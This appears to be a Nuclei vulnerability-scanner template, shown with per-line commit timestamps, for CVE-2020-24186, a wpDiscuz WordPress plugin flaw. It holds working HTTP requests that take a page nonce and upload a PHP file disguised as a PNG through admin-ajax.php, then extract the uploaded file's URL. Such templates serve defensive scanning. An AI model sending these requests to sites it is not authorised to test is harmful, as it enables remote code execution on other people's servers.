2021-02-28 07:23:43 +00:00
id : CVE-2020-24186
info :
2022-04-21 21:16:41 +00:00
name : WordPress wpDiscuz <=7.0.4 - Remote Code Execution
2021-02-28 07:23:43 +00:00
author : Ganofins
2021-03-14 14:18:25 +00:00
severity : critical
2022-05-17 09:18:12 +00:00
description : WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
2023-09-06 12:22:36 +00:00
remediation : |
Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
2022-03-29 10:33:49 +00:00
reference :
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
2022-05-17 09:18:12 +00:00
- https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
- http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-24186
cwe-id : CWE-434
2024-05-31 19:23:20 +00:00
epss-score : 0.97489
epss-percentile : 0.99973
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : gvectors
product : wpdiscuz
2023-09-06 12:22:36 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors
2021-02-28 07:23:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-28 07:23:43 +00:00
- raw :
2021-03-14 14:17:36 +00:00
- |
GET /?p=1 HTTP/1.1
Host : {{Hostname}}
Accept : */*
2021-02-28 07:23:43 +00:00
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
X-Requested-With : XMLHttpRequest
2021-03-14 14:17:36 +00:00
Content-Type : multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin : {{BaseURL}}
Referer : {{BaseURL}}
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="action"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
wmuUploadFiles
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="wmu_nonce"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="wmuAttachmentsData"
2021-03-14 14:20:00 +00:00
2021-02-28 07:23:43 +00:00
undefined
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition : form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type : image/png
2021-03-14 14:23:07 +00:00
2021-03-14 14:17:36 +00:00
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
2021-02-28 07:23:43 +00:00
<?php phpinfo();?>
2021-03-14 14:17:36 +00:00
------WebKitFormBoundary88AhjLimsDMHU1Ak
2021-02-28 07:23:43 +00:00
Content-Disposition : form-data; name="postId"
2021-03-14 14:20:00 +00:00
2021-03-14 14:17:36 +00:00
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
2021-02-28 07:23:43 +00:00
2021-03-14 14:17:36 +00:00
matchers-condition : and
2021-02-28 07:23:43 +00:00
matchers :
2021-03-14 14:17:36 +00:00
- type : word
2023-07-07 04:45:45 +00:00
part : body
2021-03-14 14:17:36 +00:00
words :
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition : and
2022-03-29 10:33:49 +00:00
2023-07-05 07:50:14 +00:00
- type : status
status :
- 200
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : wmuSecurity
group : 1
regex :
- 'wmuSecurity":"([a-z0-9]+)'
internal : true
part : body
- type : regex
group : 1
regex :
- '"url":"([a-z:\\/0-9-.]+)"'
part : body
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100e38932a4bbaeb966d0ff133b826f339af5d5ced828fa938d65afd4ca069940b602210086ec11b8bf600caea0125a35dd2eab8c0843a0335c30b73c7a29838c73c03bca:922c64590222798bb761d5b6d8e72950